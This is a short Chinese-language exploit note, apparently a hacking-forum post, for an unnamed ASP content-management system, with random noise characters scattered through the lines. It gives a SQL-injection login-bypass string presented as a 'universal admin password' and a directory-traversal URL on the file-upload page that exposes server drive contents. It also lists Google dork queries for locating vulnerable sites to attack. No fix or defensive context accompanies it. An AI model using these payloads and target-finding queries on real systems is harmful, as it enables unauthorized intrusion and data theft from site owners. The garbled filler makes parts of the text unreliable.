后台万能密码 'or'='or'# v# O) R$ W4 D1 @5 y" l! ^
- V" k; n; l9 N4 i: y2 C后台文件管理存在绕过。导致浏览所在盘符信息。信息泄露!
& p, D: J9 a8 \% A7 `admin/uploadfile.asp?currentFolder=/upfiles/../
$ X2 B9 Q Y m* z2 T# ^
# y9 F5 C6 I+ D9 p1 P- i, t漏洞证明:
+ [$ E% K$ {( T' M6 \, ]. j: v4 ^( y
谷歌:inurl:type.asp?id=1 新闻中心( g4 p5 W3 p6 v1 b) e5 d, o
或者 :inurl:download_ok.asp?8 q% G7 I' J; F0 _" ]
3 g( a$ [* S/ M9 V+ v
|